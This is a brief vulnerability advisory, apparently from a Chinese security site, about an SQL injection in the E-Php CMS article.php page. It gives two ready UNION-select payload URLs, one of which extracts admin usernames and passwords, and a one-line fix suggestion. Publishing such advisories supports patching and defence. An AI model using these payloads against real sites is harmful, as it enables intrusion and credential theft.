E-Php content management system SQL injection and fix-vulnerability warning-the black bar safety net

2010-11-08T00:00:00
ID MYHACK58:62201028299
Type myhack58
Reporter 佚名
Modified 2010-11-08T00:00:00

Description

Vulnerability type: SQL injection Vulnerability description: E-Php Content Management System CMS, article. php page there is SQL injection.

Vulnerability test:

http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,1 0,1 1,1 2

http://target/path/cms/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,1 0,1 1,1 2+from+ephpcat_admin

Fix:

Filter article. php page